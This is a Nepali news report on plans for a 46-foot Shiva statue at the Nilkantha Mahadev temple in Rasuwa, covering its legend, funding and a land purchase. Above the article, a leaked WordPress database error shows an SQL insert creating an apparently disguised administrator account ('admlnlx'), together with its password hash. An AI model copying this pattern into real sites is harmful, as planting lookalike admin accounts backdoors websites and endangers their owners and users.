WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BWL1IbmU3GxBPi0FtymkBjjqr4yTsK.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 04:42:14', '', 'admlnlx', 'admlnlx')
रसुवा । दक्षिणी भेकको कालिका–५ जिबजिबेस्थित नीलकण्ठ महादेव मन्दिर परिसरमा शिवमूर्ति राख्ने गृहकार्य अगाडि बढाइको छ । शिव नीलाद्री पर्वत जानेक्रममा केही समय बासस्थान लिनुभएको धार्मिक मान्यताअनुरूप पवित्र भूमिको धार्मिक आस्थालाई थप प्रगाढ बनाउने उद्देश्यले ४६ फिट अग्लो शिवमूर्ति स्थापना गर्ने गृहकार्य अगाडि बढेको हो ।
आफूप्रति आस्था राख्ने भक्तजनलाई निरन्तर दर्शन दिन भगवान् शिवले उत्पन्न गराई छाड्नुभएको शिलामा पुस्तौँपुस्तादेखि श्रद्धालु भक्तजनले पूजा आराधना गर्दै आएकोे पवित्र भूमिलाई विस्तार गर्ने उद्देश्यले शिवमूर्ति स्थापना गर्ने गृहकार्य अगाडि बढाइएको मन्दिर संरक्षण समितिका अध्यक्ष भवनाथ पौडेलले जानकारी दिए ।
शिवमूर्ति स्थापनाका लागि करीब रु एक करोड लाग्ने अनुमान रहेको र रू ६० लाख व्यवस्थापन भइसकेको छ । सो रकममध्ये कालिका गाउँपालिकाले रु २५ लाखको साथै प्रदेश संसद् प्रभात लामाबाट रू ३५ लाख प्राप्त भइसकेको छ । थप रकम जुटाउने प्रयास जारिरहेको नीलकण्ठ महादेव मन्दिर संरक्षण समितिले जनाएको छ ।
शिलामूर्ति रहेको मन्दिर परिसरभित्र सार्वजनिक स्थानको अभाव भएका कारण कालिगढबाट तयार भएको मूर्ति स्थापना गर्न रू छ लाख ७५ हजार बराबरको दुई रोपनी १० आना जग्गा खरीद गर्ने कामसमेत बुधबार सम्पन्न भएको छ । पुराणअनुसार समुद्रमन्थनपछि निस्केको कालकुट विष सेवन गर्दा डाह र छट्पटीले शिखर ठाउँको खोजी गर्दै भौतारिँदै महादेव नीलाद्री पर्वत जाँदै गर्दा जिबजिबेको थुम्कामा बाससस्थान लिनुभएको हो ।
शिवले नीलो कण्ठ लिएर बास लिनुभएकै कारण जिबजिबे थुम्काको शिलालाई नीलकण्ठ महादेव नामकरण भएको मन्दिर संरक्षण समितिका उपाध्यक्ष रत्नप्रसाद पौडेलले बताउनुभयो । जिबजिबेस्थित मानव बस्तीको बीच भागमा अवस्थित धार्मिकस्थलको संरक्षण र प्रवद्र्धन गर्ने कार्य विसं २०६८ देखि शुरू गरिएको र पहिलो चरणमा तत्कालीन संविधानसभा सदस्य जनार्दन ढकालले मन्दिरको जीर्णाेद्धार एवं सत्तल निर्माण गरी सहयोग गर्नुभएकाले नित्य पूजाआजाका साथै पुजारी बस्न सहजता थियो । नीलकण्ठ महादेव स्थानमा बालचर्तुदशी, शिवरात्रि, जनैपूर्णिमा एवं तीज पर्वका दिन भव्य मेला लाग्ने गरेको छ । मेलाका बखत हिन्दू तथा बौद धर्मावलम्बीका हजारौँ भक्तजन आउने गरेका छन् ।रासस